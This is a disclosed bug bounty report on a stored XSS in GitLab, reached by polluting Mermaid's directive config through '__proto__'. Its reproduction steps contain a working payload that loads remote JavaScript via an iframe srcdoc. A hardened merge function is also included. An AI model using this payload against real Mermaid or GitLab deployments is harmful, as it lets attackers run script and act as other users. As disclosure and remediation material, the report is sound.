Stored XSS via Mermaid Prototype Pollution vulnerability

Disclosed: 2021-11-18 02:03:27 By misha98857 To gitlab
High
Vulnerability Details
### Summary

I am continuing to investigate #1106238 and found an additional vector for prototype pollution and stored XSS.

### Steps to reproduce

1. Create an issue in any repository
2. Create a mermaid diagram with the following payload:

```
%%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}} }%%
%%{init: { '__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"&lt;script src=https://gitlab.com/bugbountyuser1/csp/-/jobs/1030502035/artifacts/raw/payload.js&gt; &lt;/script&gt;\">'}} }%%
sequenceDiagram
Alice->>Bob: Hi Bob
Bob->>Alice: Hi Alice
```

3. This will pollute the `template` attribute and, for example, if we click on the search bar after the page has loaded, the XSS will be executed. This still requires minimal user interaction.

### POC

1. Open https://gitlab.com/cataha319/stored-xss/-/issues/2
2. After the page has loaded, try to select the search menu on the top bar.

{F1391031} {F1391036}

### What is the current *bug* behavior?

Mermaid allows setting the `__proto__` attribute in the directive, which leads to stored XSS.

### What is the expected *correct* behavior?

Mermaid doesn't allow the `__proto__` attribute to be set in the directive and merged with the config.

### Output of checks

This vulnerability was tested on gitlab.com. On a local GitLab instance with a newer version (the same as gitlab.com) of Mermaid, it works too.

## Impact

An attacker who can add a Mermaid diagram to the page can steal some data or perform any actions as the user.
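A defensive illustration of the fix the report asks for, as an added example that is not Mermaid's or GitLab's own code: a directive-to-config merge that drops `__proto__`, `constructor` and `prototype` keys before merging, shown beside the naive recursive merge that lets a directive write into `Object.prototype`. The directive JSON, the `template` marker value and all function names are constructed for this example.

```javascript
// Keys that must never be copied from user-supplied directive data into a
// config object: each one reaches the prototype chain instead of the object.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Constructed directive payload in the shape the report describes (init
// directive carrying a "__proto__" key); the template value is a harmless marker.
const DIRECTIVE_JSON =
  '{"theme":"forest","__proto__":{"template":"CONSTRUCTED_MARKER"}}';

// Vulnerable pattern: a plain recursive merge. Reading target["__proto__"]
// returns Object.prototype, so the recursion writes "template" onto it and
// every object in the page (including an unrelated template lookup) sees it.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skip polluting keys and only recurse into the target's own
// properties, so no path through the merge can touch a prototype.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
      target[key] = safeMerge(own && typeof own === 'object' ? own : {}, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Applies the constructed directive with both merges and reports what a fresh
// object sees afterwards; the naive run is cleaned up so it cannot leak.
function demo() {
  const safe = safeMerge({ theme: 'default' }, JSON.parse(DIRECTIVE_JSON));
  const afterSafe = ({}).template;                 // stays undefined
  naiveMerge({ theme: 'default' }, JSON.parse(DIRECTIVE_JSON));
  const afterNaive = ({}).template;                // now "CONSTRUCTED_MARKER"
  delete Object.prototype.template;                // undo the demonstration
  return { afterSafe, afterNaive, safeTheme: safe.theme,
           safeHasProto: Object.keys(safe).includes('__proto__') };
}
```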
Report Stats
  • Report ID: 1280002
  • State: Closed
  • Substate: resolved
  • Upvotes: 45